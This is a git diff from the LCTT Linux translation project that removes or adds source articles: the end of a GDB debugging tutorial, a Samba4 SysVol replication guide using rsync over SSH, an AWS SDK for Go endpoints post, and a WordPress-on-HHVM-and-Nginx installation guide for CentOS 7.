0xffffffff/out; - cnt++; - } - - printf("\n Total = [%d]\n", tot); - return 0; -} -``` - -So basically, what this code does is, it picks each value contained in the 'val' array, assigns it to the 'out' integer, and then calculates 'tot' by summing up the variable's previous value and the result of '0xffffffff/out.' - -The problem here is that when the code is run, it produces the following error: - -$ ./gdb-test  -Floating point exception (core dumped) - -So, to debug the code, the first step would be to compile the program with -g. Here's the command: - -gcc -g -Wall gdb-test.c -o gdb-test - -Next up, let's run GDB and let it know which executable we want to debug. Here's the command for that: - -gdb ./gdb-test  - -Now, the error I am getting is 'floating point exception,' and as most of you might already know, it's caused by n % x, when x is 0\. So, with that in mind, I put a break point at line number 11, where the division is taking place. This was done in the following way: - -(gdb) **break 11** - -Note that '(gdb)' is the debugger's prompt, I just wrote the 'break' command. - -Now, I asked GDB to start the execution of the program: - -run - -So, when the breakpoint was hit for the first time, here's what GDB showed in the output: - -``` -Breakpoint 1, main () at gdb-test.c:11 -11 tot = tot + 0xffffffff/out; -(gdb) -``` - -As you can see in the output above, the debugger showed the line where the breakpoint was put. Now, let's print the current value of 'out.' This can be done in the following way: - -(gdb)** print out** -**$1 = 5** -(gdb) - -As you can see that the value '5' was printed. So, things are fine at the moment. I asked the debugger to continue the execution of the program until the next breakpoint, something which can be done using the 'c' command. - -c   - -I kept on doing this work, until I saw that the value of 'out' was zero. - -``` -... -... -... -Breakpoint 1, main () at gdb-test.c:11 -11 tot = tot + 0xffffffff/out; -(gdb) print out -$2 = 99 -(gdb) c -Continuing. - -Breakpoint 1, main () at gdb-test.c:11 -11 tot = tot + 0xffffffff/out; -(gdb) print out -$3 = 0 -(gdb) -``` - -Now, to confirm that this is the exact problem, I used GDB's 's' (or 'step') command instead of 'c' this time. Reason being, I just wanted line 11, where the program execution currently stands paused, to execute, and see if crash occurs at this point. - -Here's what happened: - -``` -(gdb) s - -Program received signal SIGFPE, Arithmetic exception. -0x080484aa in main () at gdb-test.c:11 -11 tot = tot + 0xffffffff/out; -``` - -Yes, as confirmed by the highlighted output above, this is where the exception was thrown. The final confirmation came when I tried running the 's' command once again: - -``` -(gdb) s - -Program terminated with signal SIGFPE, Arithmetic exception. -The program no longer exists. -``` - -So this way, you can debug your programs using GDB. - -### Conclusion - -We've just scratched the surface here, as GDB offers a lot of features for users to explore and use. Go through the man page of GDB to know more about the tool, and try using it whenever you're debugging something in your code. The debugger has a bit of learning curve associated with it, but it's worth the hard work. - --------------------------------------------------------------------------------- - -via: https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/ - -作者:[Ansh - ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/ -[1]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/#gdb-debugger-basics -[2]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/#gdb-usage-example -[3]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/#conclusion -[4]:https://www.sourceware.org/gdb/ -[5]:https://linux.die.net/man/1/gcc -[6]:https://www.sourceware.org/gdb/download/ diff --git a/sources/tech/20170116 Setup SysVol Replication Across Two Samba4 AD DC with Rsync - Part 6.md b/sources/tech/20170116 Setup SysVol Replication Across Two Samba4 AD DC with Rsync - Part 6.md deleted file mode 100644 index 2a0c20b858..0000000000 --- a/sources/tech/20170116 Setup SysVol Replication Across Two Samba4 AD DC with Rsync - Part 6.md +++ /dev/null @@ -1,198 +0,0 @@ -# rusking translating -Setup SysVol Replication Across Two Samba4 AD DC with Rsync – Part 6 -============================================================ - -This topic will cover SysVol replication across two Samba4 Active Directory Domain Controllers performed with the help of a few powerful Linux tools, such as [Rsync file synchronization utility][2], [Cron scheduling daemon][3] and [SSH protocol][4]. - -#### Requirements: - -1. [Join Ubuntu 16.04 as Additional Domain Controller to Samba4 AD DC – Part 5][1] - -### Step 1: Accurate Time Synchronization Across DCs - -1. Before starting to replicate the contents of the sysvol directory across both domain controllers you need to provide an accurate time for these machines. - -If the delay is greater than 5 minutes on both directions and their clocks are not properly in sync, you should start experiencing various problems with AD accounts and domain replication. - -To overcome the problem of time drifting between two or more domain controllers, you need to [install and configure NTP server][5] on your machine by executing the below command. - -``` -# apt-get install ntp -``` - -2. After NTP daemon has been installed, open the main configuration file, comment the default pools (add a # in front of each pool line) and add a new pool which will point back to the main Samba4 AD DC FQDN with NTPserver installed, as suggested on the below example. - -``` -# nano /etc/ntp.conf -``` - -Add following lines to ntp.conf file. - -``` -pool 0.ubuntu.pool.ntp.org iburst -#pool 1.ubuntu.pool.ntp.org iburst -#pool 2.ubuntu.pool.ntp.org iburst -#pool 3.ubuntu.pool.ntp.org iburst -pool adc1.tecmint.lan -# Use Ubuntu's ntp server as a fallback. -pool ntp.ubuntu.com -``` -[ - ![Configure NTP for Samba4](http://www.tecmint.com/wp-content/uploads/2017/01/Configure-NTP-for-Samba4.png) -][6] - -Configure NTP for Samba4 - -3. Don’t close the file yet, move to the bottom of the file and add the following lines in order for other clients to be able to query and [sync the time with this NTP server][7], issuing signed NTP requests, in case the primary DC goes offline: - -``` -restrict source notrap nomodify noquery mssntp -ntpsigndsocket /var/lib/samba/ntp_signd/ -``` - -4. Finally, save and close the configuration file and restart NTP daemon in order to apply the changes. Wait for a few seconds or minutes for the time to synchronize and issue ntpq command in order to print the current summary state of the adc1 peer in sync. - -``` -# systemctl restart ntp -# ntpq -p -``` -[ - ![Synchronize NTP Time with Samba4 AD](http://www.tecmint.com/wp-content/uploads/2017/01/Synchronize-Time.png) -][8] - -Synchronize NTP Time with Samba4 AD - -### Step 2: SysVol Replication with First DC via Rsync - -By default, Samba4 AD DC doesn’t perform SysVol replication via DFS-R (Distributed File System Replication) or the FRS (File Replication Service). - -This means that Group Policy objects are available only if the first domain controller is online. If the first DC becomes unavailable, the Group Policy settings and logon scripts will not apply further on Windows machines enrolled into the domain. - -To overcome this obstacle and achieve a rudimentary form of SysVol replication we will schedule a [Linux rsync command][9] combined with a SSH encrypted tunnel with [key-based SSH authentication][10] in order to securely transfer GPO objects from the first domain controller to the second domain controller. - -This method ensures GPO objects consistency across domain controllers, but has one huge drawback. It works only in one direction because rsync will transfer all changes from the source DC to the destination DC when synchronizing GPO directories. - -Objects which no longer exist on the source will be deleted from the destination as well. In order to limit and avoid any conflicts, all GPO edits should be made only on the first DC. - -5. To start the process of SysVol replication, first [generate a SSH key on the first Samba AD DC][11] and transfer the key to the second DC by issuing the below commands. - -Do not use a passphrase for this key in order for the scheduled transfer to run without user interference. - -``` -# ssh-keygen -t RSA -# ssh-copy-id root@adc2 -# ssh adc2 -# exit -``` -[ - ![Generate SSH Key on Samba4 DC](http://www.tecmint.com/wp-content/uploads/2017/01/Generate-SSH-Key.png) -][12] - -Generate SSH Key on Samba4 DC - -6. After you’ve assured that the root user from the first DC can automatically login on the second DC, run the following Rsync command with `--dry-run` parameter in order simulate SysVol replication. Replace adc2accordingly. - -``` -# rsync --dry-run -XAavz --chmod=775 --delete-after --progress --stats /var/lib/samba/sysvol/ root@adc2:/var/lib/samba/sysvol/ -``` - -7. If the simulation process works as expected, run the rsync command again without the `--dry-run` option in order to actually replicate GPO objects across your domain controllers. - -``` -# rsync -XAavz --chmod=775 --delete-after --progress --stats /var/lib/samba/sysvol/ root@adc2:/var/lib/samba/sysvol/ -``` -[ - ![Samba4 AD DC SysVol Replication](http://www.tecmint.com/wp-content/uploads/2017/01/SysVol-Replication-for-Samba4-DC.png) -][13] - -Samba4 AD DC SysVol Replication - -8. After SysVol replication process has finished, login to the destination domain controller and list the contents of one of the GPO objects directory by running the below command. - -The same GPO objects from the first DC should be replicated here too. - -``` -# ls -alh /var/lib/samba/sysvol/your_domain/Policiers/ -``` -[ - ![Verify Samba4 DC SysVol Replication](http://www.tecmint.com/wp-content/uploads/2017/01/Verify-Samba4-DC-SysVol-Replication.png) -][14] - -Verify Samba4 DC SysVol Replication - -9. To automate the process of Group Policy replication (sysvol directory transport over network), schedule a root job to run the rsync command used earlier every 5 minutes by issuing the below command. - -``` -# crontab -e -``` - -Add rsync command to run every 5 minutes and direct the output of the command, including the errors, to the log file /var/log/sysvol-replication.log .In case something doesn’t work as expected you should consult this file in order to troubleshoot the problem. - -``` -*/5 * * * * rsync -XAavz --chmod=775 --delete-after --progress --stats /var/lib/samba/sysvol/ root@adc2:/var/lib/samba/sysvol/ > /var/log/sysvol-replication.log 2>&1 -``` - -10. Assuming that in future there will be some related issues with SysVol ACL permissions, you can run the following commands in order to detect and repair these errors. - -``` -# samba-tool ntacl sysvolcheck -# samba-tool ntacl sysvolreset -``` -[ - ![Fix SysVol ACL Permissions](http://www.tecmint.com/wp-content/uploads/2017/01/Fix-SysVol-ACL-Permissions.png) -][15] - -Fix SysVol ACL Permissions - -11. In case the first Samba4 AD DC with FSMO role as “PDC Emulator” becomes unavailable, you can force the Group Policy Management Console installed on a Microsoft Windows system to connect only to the second domain controller by choosing Change Domain Controller option and manually selecting the target machine as illustrated below. - -[ - ![Change Samba4 Domain Controller](http://www.tecmint.com/wp-content/uploads/2017/01/Change-Samba4-Domain-Controller.png) -][16] - -Change Samba4 Domain Controller - -[ - ![Select Samba4 Domain Controller](http://www.tecmint.com/wp-content/uploads/2017/01/Select-Samba4-Domain-Controller.png) -][17] - -Select Samba4 Domain Controller - -While connected to the second DC from Group Policy Management Console, you should avoid making any modification to your domain Group Policy. When the first DC will become available again, rsync command will destroy all changes made on this second domain controller. - --------------------------------------------------------------------------------- - -作者简介: - -![](http://2.gravatar.com/avatar/be16e54026c7429d28490cce41b1e157?s=128&d=blank&r=g) - -I'am a computer addicted guy, a fan of open source and linux based system software, have about 4 years experience with Linux distributions desktop, servers and bash scripting. - --------------------------------------------------------------------------------- - -via: http://www.tecmint.com/samba4-ad-dc-sysvol-replication/ - -作者:[Matei Cezar][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.tecmint.com/author/cezarmatei/ -[1]:http://www.tecmint.com/join-additional-ubuntu-dc-to-samba4-ad-dc-failover-replication/ -[2]:http://www.tecmint.com/rsync-local-remote-file-synchronization-commands/ -[3]:http://www.tecmint.com/11-cron-scheduling-task-examples-in-linux/ -[4]:http://www.tecmint.com/5-best-practices-to-secure-and-protect-ssh-server/ -[5]:http://www.tecmint.com/install-and-configure-ntp-server-client-in-debian/ -[6]:http://www.tecmint.com/wp-content/uploads/2017/01/Configure-NTP-for-Samba4.png -[7]:http://www.tecmint.com/how-to-synchronize-time-with-ntp-server-in-ubuntu-linux-mint-xubuntu-debian/ -[8]:http://www.tecmint.com/wp-content/uploads/2017/01/Synchronize-Time.png -[9]:http://www.tecmint.com/rsync-local-remote-file-synchronization-commands/ -[10]:http://www.tecmint.com/ssh-passwordless-login-using-ssh-keygen-in-5-easy-steps/ -[11]:http://www.tecmint.com/ssh-passwordless-login-using-ssh-keygen-in-5-easy-steps/ -[12]:http://www.tecmint.com/wp-content/uploads/2017/01/Generate-SSH-Key.png -[13]:http://www.tecmint.com/wp-content/uploads/2017/01/SysVol-Replication-for-Samba4-DC.png -[14]:http://www.tecmint.com/wp-content/uploads/2017/01/Verify-Samba4-DC-SysVol-Replication.png -[15]:http://www.tecmint.com/wp-content/uploads/2017/01/Fix-SysVol-ACL-Permissions.png -[16]:http://www.tecmint.com/wp-content/uploads/2017/01/Change-Samba4-Domain-Controller.png -[17]:http://www.tecmint.com/wp-content/uploads/2017/01/Select-Samba4-Domain-Controller.png diff --git a/sources/tech/20170116 Using the AWS SDK for Gos Regions and Endpoints Metadata.md b/sources/tech/20170116 Using the AWS SDK for Gos Regions and Endpoints Metadata.md new file mode 100644 index 0000000000..2651b624dd --- /dev/null +++ b/sources/tech/20170116 Using the AWS SDK for Gos Regions and Endpoints Metadata.md @@ -0,0 +1,100 @@ +Using the AWS SDK for Go’s Regions and Endpoints Metadata +============================================================ + +
+ +In release [v1.6.0][1] of the [AWS SDK for Go][2], we added Regions and Endpoints metadata to the SDK. This feature enables you to easily enumerate the metadata and discover Regions, Services, and Endpoints. You can find this feature in the [github.com/aws/aws-sdk-go/aws/endpoints][3] package. + +The endpoints package provides a simple interface to get a service’s endpoint URL and enumerate the Region metadata. The metadata is grouped into partitions. Each partition is a group of AWS Regions such as AWS Standard, AWS China, and AWS GovCloud (US). + +### Resolving Endpoints + +The SDK automatically uses the endpoints.DefaultResolver function when setting the SDK’s default configuration. You can resolve endpoints yourself by calling the EndpointFor methods in the endpoints package. + +Go +``` +// Resolve endpoint for S3 in us-west-2 +resolver := endpoints.DefaultResolver() +endpoint, err := resolver.EndpointFor(endpoints.S3ServiceID, endpoints.UsWest2RegionID) +if err != nil { + fmt.Println("failed to resolve endpoint", err) + return +} + +fmt.Println("Resolved URL:", endpoint.URL) +``` + +If you need to add custom endpoint resolution logic to your code, you can implement the endpoints.Resolver interface, and set the value to aws.Config.EndpointResolver. This is helpful when you want to provide custom endpoint logic that the SDK will use for resolving service endpoints. + +The following example creates a Session that is configured so that [Amazon S3][4] service clients are constructed with a custom endpoint. + +Go +``` +s3CustResolverFn := func(service, region string, optFns ...func(*endpoints.Options)) (endpoints.ResolvedEndpoint, error) { + if service == "s3" { + return endpoints.ResolvedEndpoint{ + URL: "s3.custom.endpoint.com", + SigningRegion: "custom-signing-region", + }, nil + } + + return defaultResolver.EndpointFor(service, region, optFns...) +} +sess := session.Must(session.NewSessionWithOptions(session.Options{ + Config: aws.Config{ + Region: aws.String("us-west-2"), + EndpointResolver: endpoints.ResolverFunc(s3CustResolverFn), + }, +})) +``` + +### Partitions + +The return value of the endpoints.DefaultResolver function can be cast to the endpoints.EnumPartitions interface. This will give you access to the slice of partitions that the SDK will use, and can help you enumerate over partition information for each partition. + +Go +``` +// Iterate through all partitions printing each partition's ID. +resolver := endpoints.DefaultResolver() +partitions := resolver.(endpoints.EnumPartitions).Partitions() + +for _, p := range partitions { + fmt.Println("Partition:", p.ID()) +} +``` + +In addition to the list of partitions, the endpoints package also includes a getter function for each partition group. These utility functions enable you to enumerate a specific partition without having to cast and enumerate over all the default resolver’s partitions. + +Go +``` +partition := endpoints.AwsPartition() +region := partition.Regions()[endpoints.UsWest2RegionID] + +fmt.Println("Services in region:", region.ID()) +for id, _ := range region.Services() { + fmt.Println(id) +} +``` + +Once you have a Region or Service value, you can call ResolveEndpoint on it. This provides a filtered view of the Partition when resolving endpoints. + +Check out the AWS SDK for Go repo for [more examples][5]. Let us know in the comments what you think of the endpoints package. + +
+ +-------------------------------------------------------------------------------- + +via: https://aws.amazon.com/cn/blogs/developer/using-the-aws-sdk-for-gos-regions-and-endpoints-metadata + +作者:[ Jason Del Ponte][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://aws.amazon.com/cn/blogs/developer/using-the-aws-sdk-for-gos-regions-and-endpoints-metadata +[1]:https://github.com/aws/aws-sdk-go/releases/tag/v1.6.0 +[2]:https://github.com/aws/aws-sdk-go +[3]:http://docs.aws.amazon.com/sdk-for-go/api/aws/endpoints/ +[4]:https://aws.amazon.com/s3/ +[5]:https://github.com/aws/aws-sdk-go/tree/master/example/aws/endpoints diff --git a/sources/tech/20170117 How to Install WordPress with HHVM and Nginx on CentOS 7.md b/sources/tech/20170117 How to Install WordPress with HHVM and Nginx on CentOS 7.md deleted file mode 100644 index a5c3f83f62..0000000000 --- a/sources/tech/20170117 How to Install WordPress with HHVM and Nginx on CentOS 7.md +++ /dev/null @@ -1,446 +0,0 @@ -How to Install WordPress with HHVM and Nginx on CentOS 7 -============================================================ - -### On this page - -1. [Step 1 - Configure SELinux and add the Epel Repository][1] -2. [Step 2 - Install Nginx][2] -3. [Step 3 - Install and Configure MariaDB][3] -4. [Step 4 - Install HHVM][4] -5. [Step 5 - Configure HHVM][5] -6. [Step 6 - Configure HHVM and Nginx][6] -7. [Step 7 - Create a Virtual Host with HHVM and Nginx][7] -8. [Step 8 - Install WordPress][8] -9. [Reference][9] - -HHVM (HipHop Virtual Machine) is an open source virtual machine for executing programs written in PHP and Hack language. HHVM has been developed by Facebook, it provides most features of the current PHP 7 version. To run HHVM on your server, you can use a FastCGI to connect HHVM with a Nginx or Apache web server, or you can use the web server built into HHVM called "Proxygen". - -In this tutorial, I will show you how to install WordPress with HHVM and Nginx as web server. I will use CentOS 7 as the operating system, so basic knowledge of CentOS is required. - -**Prerequisite** - -* CentOS 7 - 64bit -* Root privileges - -### Step 1 - Configure SELinux and add the Epel Repository - -In this tutorial, we will use SELinux in enforcing mode, so we need the SELinux management tools installed on the system. We will use setools and setrobleshoot to manage SELinux policies. - -By default, SELinux is enabled on CentOS 7, We can check that for with command below: - -sestatus -getenforce - -[ - ![Check SELinux](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/1.png) -][10] - -You can see SELinux is enabled with enforcing mode. - -Next, Install setools and setroubleshoot with the yum command. - -yum -y install setroubleshoot setools net-tools - -When the installation has been completed, you can install the EPEL repository. - -yum -y install epel-release - -### Step 2 - Install Nginx - -Nginx or engine-x is a lightweight web server with high performance and low memory consumption. On CentOS, we can use yum to install the Nginx packages. Make sure you are logged in as root user! - -Install nginx with this yum command from the CentOS repository: - -yum -y install nginx - -Now start Nginx and enable it to be started at boot time with the systemctl command: - -systemctl start nginx -systemctl enable nginx - -To ensure Nginx is running on our server, visit the server IP address with your browser, or use the curl command as shown below to get the results: - -curl 192.168.1.110 - -I'll cehck it with my web browser here: - -[ - ![Nginx is running](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/2.png) -][11] - -### Step 3 - Install and Configure MariaDB - -MariaDB is an open source database developed by the original MySQL developer Monty Widenius, it has been forked from the MySQL database but stays compatible with it in its major functions. In this step, we will install MariaDB and configure the root password for the MariaDB database. Then we will create a new database and new user that are required for our WordPress installation. - -Install mariadb and mariadb-server: - -yum -y install mariadb mariadb-server - -Start MariaDB and add the service to be automatically started at boot time: - -systemctl start mariadb -systemctl enable mariadb - -MariaDB has been started, and now we have to configure the root password for the mariadb/mysql database. Type in the command below to setup the MariaDB root password. - -mysql_secure_installation - -Type in your new password for the MariaDB root user when requested. - -Set root password? [Y/n] Y -New password: -Re-enter new password: - -Remove anonymous users? [Y/n] Y - ... Success! -Disallow root login remotely? [Y/n] Y - ... Success! -Remove test database and access to it? [Y/n] Y -Reload privilege tables now? [Y/n] Y - ... Success! - -The MariaDB root password has been configured. Now login to the MariaDB/MySQL shell and create a new database **"wordpressdb"** and a new user **"wpuser"** with password **"wpuser@"** for our WordPress installation. Choose a secure password for your installation! - -Login to the MariaDB/MySQL shell: - -mysql -u root -p -TYPE YOUR PASSWORD - -Create a new database and new user: - -create database wordpressdb; -create user wpuser@localhost identified by 'wpuser@'; -grant all privileges on wordpressdb.* to wpuser@localhost identified by 'wpuser@'; -flush privileges; -\q - -[ - ![Create Database for Wordpress Installation on MariaDB](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/3.png) -][12] - -MariaDB has been installed and the new database for our WordPress installation has been created. - -### Step 4 - Install HHVM - -For the HHVM installation, we need to install many dependencies. We can install HHVM from source by downloading the source from github, or installing prebuilt packages that are available on the internet. In this tutorial, I will install HHVM from prebuilt packages. - -Install the dependencies for the HHVM installation - -yum -y install cpp gcc-c++ cmake git psmisc {binutils,boost,jemalloc,numactl}-devel \ -{ImageMagick,sqlite,tbb,bzip2,openldap,readline,elfutils-libelf,gmp,lz4,pcre}-devel \ -lib{xslt,event,yaml,vpx,png,zip,icu,mcrypt,memcached,cap,dwarf}-devel \ -{unixODBC,expat,mariadb}-devel lib{edit,curl,xml2,xslt}-devel \ -glog-devel oniguruma-devel ocaml gperf enca libjpeg-turbo-devel openssl-devel \ -mariadb mariadb-server libc-client make - -Then install the HHVM prebuilt packages from [this site][13] with the rpm command. - -rpm -Uvh http://mirrors.linuxeye.com/hhvm-repo/7/x86_64/hhvm-3.15.2-1.el7.centos.x86_64.rpm -ln -s /usr/local/bin/hhvm /bin/hhvm - -HHVM has been installed, check it with the command below: - -hhvm --version - -In order to use the php command, we can set the hhvm command as php. So when you type 'php' on the shell, you will see the same result as from the hhvm command. - -sudo update-alternatives --install /usr/bin/php php /usr/bin/hhvm 60 -php --version - -[ - ![Installing HHVM on CentOS](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/4.png) -][14] - -### Step 5 - Configure HHVM - -In this step, we will configure HHVM. We will run hhvm as a systemd service. Instead of running it on a system port, we will run hhvm on a unix socket file which is faster. - -Go to the systemd directory and create the hhvm.service file. - -cd /etc/systemd/system/ -vim hhvm.service - -Paste the service configuration belowinto that file. - -``` -[Unit] -Description=HHVM HipHop Virtual Machine (FCGI) -After=network.target nginx.service mariadb.service - -[Service] -ExecStart=/usr/local/bin/hhvm --config /etc/hhvm/server.ini --user nginx --mode daemon -vServer.Type=fastcgi -vServer.FileSocket=/var/run/hhvm/hhvm.sock - -[Install] -WantedBy=multi-user.target -``` - -Save the file and exit vim. - -Next, go to the hhvm directory and edit the server.ini file. - -cd /etc/hhvm/ -vim server.ini - -Replace the hhvm.server.port on line 7 with unix socket configuration below: - -hhvm.server.file_socket = /var/run/hhvm/hhvm.sock - -Save the file and exit th editor. - -In the hhvm service file, we've defined that hhvm is running under the 'nginx' user, so we must change the owner of the socket file directory to the 'nginx' user. Then we must change the SELinux context of the hhvm directoryto allow access to the socket file. - -chown -R nginx:nginx /var/run/hhvm/ -semanage fcontext -a -t httpd_var_run_t "/var/run/hhvm(/.*)?" -restorecon -Rv /var/run/hhvm - -After rebooting the server, hhvm will not be running because there is no directory for the socket file, so we must create it automatically at the boot time. - -Edit the rc.local file with vim. - -vim /etc/rc.local - -Paste configuration below to the end of line. - -``` -mkdir -p /var/run/hhvm/ -chown -R nginx:nginx /var/run/hhvm/ -semanage fcontext -a -t httpd_var_run_t "/var/run/hhvm(/.*)?" -restorecon -Rv /var/run/hhvm -``` - -Save the file and exit vim. Make the file executable. - -chmod +x /etc/rc.local - -Reload the systemd service, start hhvm and add it to be started at boot time. - -systemctl daemon-reload -systemctl start hhvm -systemctl enable hhvm - -Make sure that there is no error. Check that hhvm is running under the socket file with the netstat command. - -netstat -pl | grep hhvm - -[ - ![Check the HHVM socket file](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/5.png) -][15] - -### Step 6 - Configure HHVM and Nginx - -In this step, we will configure HHVM to run with the Nginx web server. We need to create a new hhvm configuration file in the Nginx directory. - -Go to the /etc/nginx directory and create a hhvm.conf file. - -cd /etc/nginx/ -vim hhvm.conf - -Paste the configuration below: - -``` -location ~ \.(hh|php)$ { -    root /usr/share/nginx/html; -    fastcgi_keep_conn on; -    fastcgi_pass unix:/var/run/hhvm/hhvm.sock; -    fastcgi_index  index.php; -    fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name; -    include        fastcgi_params; -} -``` - -Save and exit. - -Next, edit the nginx.conf file and add the hhvm configuration include line. - -vim nginx.conf - -Add the configuration to the server directive line 57. - -``` -include /etc/nginx/hhvm.conf; -``` - -Save and exit. - -Then change the SELinux context of the hhvm configuration file. - -semanage fcontext -a -t httpd_config_t /etc/nginx/hhvm.conf -restorecon -v /etc/nginx/hhvm.conf - -Test the Nginx configuration and restart the service. - -nginx -t -systemctl restart nginx - -Make sure there is no error. - -### Step 7 - Create a Virtual Host with HHVM and Nginx - -In this step, we will create a new virtual host configuration with Nginx and hhvm. I will use the domain name **"natsume.co"** for this example. Please use your own domain name and replace it in the configuration files and WordPress installation wherever it appears. - -Go to the nginx conf.d directory where we will store virtual host file: - -cd /etc/nginx/conf.d/ - -Create the new configuration "natsume.conf" with vim: - -vim natsume.conf - -Paste the virtual host configuration below: - -``` -server { - listen 80; - server_name natsume.co; - - # note that these lines are originally from the "location /" block - root /var/www/hakase; - index index.php index.html index.htm; - - location / { - try_files $uri $uri/ =404; - } - error_page 404 /404.html; - location = /50x.html { - root /var/www/hakase; - } - - location ~ \.php$ { - try_files $uri =404; - fastcgi_pass unix:/var/run/hhvm/hhvm.sock; - fastcgi_index index.php; - fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; - include fastcgi_params; - } -} -``` - -Save and exit. - -In our virtual host configuration, we've defined the web root directory for the domain name to be the "/var/www/hakase" directory. That directory does not exist yet, so we have to create it and change the ownership to the nginx user and group. - -mkdir -p /var/www/hakase -chown -R nginx:nginx /var/www/hakase - -Next, configure the SELinux context for the file and directory. - -semanage fcontext -a -t httpd_config_t "/etc/nginx/conf.d(/.*)?" -restorecon -Rv /etc/nginx/conf.d - -Finally, test the nginx configuration to ensure there is no error, then restart nginx: - -nginx -t -systemctl restart nginx - -### Step 8 - Install WordPress - -In step 5 we've created the virtual host configuration for our WordPress installation. Now we just have to download WordPress and edit the database configuration by using the database and user that we've created in step 3. - -Go to the web root directory "/var/www/hakase"  and download WordPress with the wget command: - -cd /var/www/hakase -wget wordpress.org/latest.tar.gz - -Extract "latest.tar.gz"  and move all WordPress files and directories to the current directory: - -tar -xzvf latest.tar.gz -mv wordpress/* . - -Next, copy "wp-config-sample.php" file to "wp-config.php" and edit it with vim: - -cp wp-config-sample.php wp-config.php -vim wp-config.php - -Set DB_NAME to **"wordpressdb"**, DB_USER to **"wpuser"** and DB_PASSWORD to **"wpuser@"**. - -``` -define('DB_NAME', 'wordpressdb'); -define('DB_USER', 'wpuser'); -define('DB_PASSWORD', 'wpuser@'); -define('DB_HOST', 'localhost'); -``` - -Save and exit. - -[ - ![WordPress Configuration](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/6.png) -][16] - -Change the SELinux context for the WordPress directory. - -semanage fcontext -a -t httpd_sys_content_t "/var/www/hakase(/.*)?" -restorecon -Rv /var/www/hakase - -Now open a web browser and type in the domain name of your wordpress domain into the address bar, mine is "natsume.co". - -Choose English language and click on 'Continue'. - -[ - ![Wordpress Installation - Choose language](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/7.png) -][17] - -Fill in the site title and description with your info and click "Install Wordpress". - -[ - ![Wordpress Installation - Configure Admin and Site Title](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/8.png) -][18] - -Wait until the installation is finished. You will see the page below, click on "Log In" to log in to the WordPress admin dashboard: - -[ - ![Wordpress Install - Installation Success with HHVM Nginx on CentOS 7](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/9.png) -][19] - -Type in your admin user and password, then click "Log In" again. - -[ - ![Login to wordpress admin dashboard](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/10.png) -][20] - -Now you're on the WordPress admin dashboard. - -[ - ![Wordpress Admin Dashboard](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/11.png) -][21] - -Wordpress Home Page. - -[ - ![Wordpress Home Page Default](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/12.png) -][22] - -Wordpress with Nginx and HHVM on CentOS 7 has been installed successfully. - --------------------------------------------------------------------------------- - -via: https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/ - -作者:[ Muhammad Arul][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/ -[1]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-configure-selinux-and-add-the-epel-repository -[2]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-nginx -[3]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-and-configure-mariadb -[4]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-hhvm -[5]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-configure-hhvm -[6]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-configure-hhvm-and-nginx -[7]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-create-a-virtual-host-with-hhvm-and-nginx -[8]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-wordpress -[9]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#reference -[10]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/1.png -[11]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/2.png -[12]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/3.png 